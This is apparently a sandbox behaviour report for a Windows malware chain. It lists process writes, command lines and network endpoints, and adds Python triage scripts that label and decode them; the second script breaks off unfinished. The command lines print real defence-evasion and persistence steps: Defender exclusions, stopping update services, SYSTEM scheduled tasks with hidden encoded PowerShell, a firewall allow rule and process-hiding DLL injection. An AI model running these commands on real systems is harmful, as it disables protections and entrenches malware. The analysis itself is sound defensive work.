PID 2520 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 1260 wrote to memory of 2160 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1260 wrote to memory of 2160 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1260 wrote to memory of 2160 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1260 wrote to memory of 2160 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1868 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 2252 wrote to memory of 1992 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\8D13.exe

C:\Users\Admin\AppData\Local\Temp\8D13.exe

C:\Users\Admin\AppData\Local\Temp\8DC0.exe

C:\Users\Admin\AppData\Local\Temp\8DC0.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\8ED9.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\8FB5.exe

C:\Users\Admin\AppData\Local\Temp\8FB5.exe

C:\Users\Admin\AppData\Local\Temp\90BF.exe

C:\Users\Admin\AppData\Local\Temp\90BF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Users\Admin\AppData\Local\Temp\918B.exe

C:\Users\Admin\AppData\Local\Temp\918B.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\system32\taskeng.exe

taskeng.exe {625F4F04-2755-4BCE-B472-16D638B20406} S-1-5-21-3425689832-2386927309-2650718742-1000:AWDHTXES\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\1664.exe

C:\Users\Admin\AppData\Local\Temp\1664.exe

C:\Users\Admin\AppData\Local\Temp\1AD8.exe

C:\Users\Admin\AppData\Local\Temp\1AD8.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\2390.exe

C:\Users\Admin\AppData\Local\Temp\2390.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 520

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp" /SL4 $40164 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Users\Admin\AppData\Local\Temp\7068.exe

C:\Users\Admin\AppData\Local\Temp\7068.exe

C:\Users\Admin\AppData\Local\Temp\7855.exe

C:\Users\Admin\AppData\Local\Temp\7855.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPKyesWPL" /SC once /ST 02:16:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPKyesWPL"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 256

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025051245.log C:\Windows\Logs\CBS\CbsPersist_20231025051245.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15853144891527524001945275187191357750519714934011382663106475152949-1282761341"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1554704128-222346730-369300441-1736332362-9814224481424169158-1893469870-1551480124"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {52B13E67-5EE5-45A8-ACCE-D819C1C9930E} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPKyesWPL"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 05:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AKYoIfz.exe\" 3Y /dnsite_idPfQ 385119 /S" /V1 /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam
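Added example (not part of the sandbox report or of any tool it names): a small triage pass over the command lines listed above. It decodes the -EncodedCommand argument the way PowerShell does (base64 over UTF-16LE, not UTF-8) and labels the defence-evasion and persistence patterns that are visible in the list: Defender policy keys written with REG ADD, Add-MpPreference exclusions, sc stop of the update services, privileged scheduled tasks, the netsh allow rule and the powercfg changes. The sample lines are copied from the list above; the signature names, the service allowlist and the regexes are this example's own choices.

```python
"""Command-line triage for the behavioral process list above.

Added example, not part of the original report.  The sample lines are
copied from the command-line list; the signature labels, the service
allowlist and the regular expressions are this example's own choices."""
import base64
import re

# Constructed sample: command lines taken from the behavioral process list.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc',
    r'schtasks /CREATE /TN "gPKyesWPL" /SC once /ST 02:16:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'''"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"''',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'powercfg /x -standby-timeout-ac 0',
    r'C:\Windows\system32\cmd.exe /S /D /c" echo Y"',
]

# Policy hive that Defender reads for managed settings (compared lowercased).
DEFENDER_POLICY_KEY = r"hklm\software\policies\microsoft\windows defender"
# Assumption: stopping any of these is treated as tampering with Windows Update.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# -EncodedCommand and its accepted abbreviations, followed by the base64 blob.
ENCODED_CMD_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext behind a PowerShell -EncodedCommand argument,
    or None.  PowerShell base64-encodes UTF-16LE text, so decoding as
    UTF-8 would return the script interleaved with NUL bytes."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return the signature labels that fire on one command line, in a
    fixed order.  Label names are this example's own."""
    hits = []
    low = cmdline.lower()
    if "reg add" in low and DEFENDER_POLICY_KEY in low:
        if "\\exclusions\\" in low:
            hits.append("defender_policy_exclusion")
        if "spynetreporting" in low:
            hits.append("defender_policy_telemetry_off")
    if "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion_cmdlet")
    if set(re.findall(r"sc(?:\.exe)?\s+stop\s+(\w+)", low)) & UPDATE_SERVICES:
        hits.append("stop_update_services")
    if "schtasks" in low and "/create" in low:
        if re.search(r'/ru\s+"?system\b|/rl\s+highest', low):
            hits.append("schtask_privileged")
        else:
            hits.append("schtask_create")
    if "netsh" in low and "advfirewall" in low and "action=allow" in low:
        hits.append("firewall_allow_rule")
    if "powercfg" in low and re.search(r"-(standby|hibernate)-timeout-(ac|dc)\s+0\b", low):
        hits.append("disable_sleep")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("powershell_encoded")
        if "-windowstyle hidden" in decoded.lower():
            hits.append("hidden_window")
    return hits


def triage(cmdlines):
    """Map each command line to its labels; lines with no hits are dropped."""
    labelled = {c: classify(c) for c in cmdlines}
    return {c: labels for c, labels in labelled.items() if labels}


if __name__ == "__main__":
    for line, labels in triage(SAMPLE_CMDLINES).items():
        print(", ".join(labels).ljust(48), line[:70])
        decoded = decode_encoded_command(line)
        if decoded:
            print(" " * 48, "decoded:", decoded)
```

On these inputs the encoded task body decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which matches the gpupdate.exe /force launch that appears later in the list; the benign `cmd /S /D /c" echo Y"` line (used only to feed "Y" to cacls) produces no labels.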

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
TR 185.216.70.222:80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 194.169.175.235:42691 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 258bc033-5a75-4d5f-af99-c31c29b9172e.uuid.allstatsin.ru udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
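Added example (not part of the sandbox report): turning the network table above into a deduplicated endpoint list. The table mixes resolver queries, repeated connections and rows with no Domain column, so the example parses the 3- or 4-field rows, separates DNS lookups from endpoints, counts repeats, and tags raw-IP HTTP, non-standard ports and tracker domains. The rows are copied from the table above; the background-domain suffixes, the tracker watchlist and the resolver address are this example's own assumptions, not findings of the report.

```python
"""Endpoint triage over the sandbox network table above.

Added example, not part of the original report.  Rows are copied from the
table above (the Domain column is empty on some rows, as on the page);
the suffix allowlist and the tracker watchlist are assumptions."""

# Constructed sample: rows from the network table, inconsistent column
# count kept on purpose.
SAMPLE_ROWS = """
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
""".strip().splitlines()

# Assumption: names under these suffixes are OS/sandbox background traffic
# (symbol server, Azure blob storage), not the sample's own infrastructure.
BACKGROUND_SUFFIXES = (".microsoft.com", ".windows.net")
# Assumption: public IP-logger services used as victim counters.
TRACKER_DOMAINS = {"iplogger.com"}
# Assumption: the sandbox's DNS resolver; port-53 UDP to it is a lookup.
RESOLVERS = {"8.8.8.8"}


def parse_row(row):
    """Split one row into (country, ip, port, domain_or_None, proto).
    The Domain column is optional, so a row has 3 or 4 fields."""
    fields = row.split()
    if len(fields) not in (3, 4):
        raise ValueError(f"unexpected row: {row!r}")
    country, dest, proto = fields[0], fields[1], fields[-1]
    domain = fields[2] if len(fields) == 4 else None
    ip, port = dest.rsplit(":", 1)
    return country, ip, int(port), domain, proto


def tag_endpoint(ip, port, domain):
    """Tags for one endpoint; an IP literal in the Domain column counts as
    having no name, just like an empty column."""
    tags = []
    unnamed = domain is None or domain == ip
    if domain and domain.endswith(BACKGROUND_SUFFIXES):
        tags.append("os_background")
    if domain in TRACKER_DOMAINS:
        tags.append("tracker_beacon")
    if unnamed and port == 80:
        tags.append("raw_ip_http")
    if port not in (53, 80, 443):
        tags.append("nonstandard_port")
    return tags


def triage_network(rows):
    """Return (dns_lookups, endpoints): the names the sample resolved, in
    first-seen order, and each endpoint with hit count, name and tags."""
    dns_lookups = []
    endpoints = {}
    for row in rows:
        country, ip, port, domain, proto = parse_row(row)
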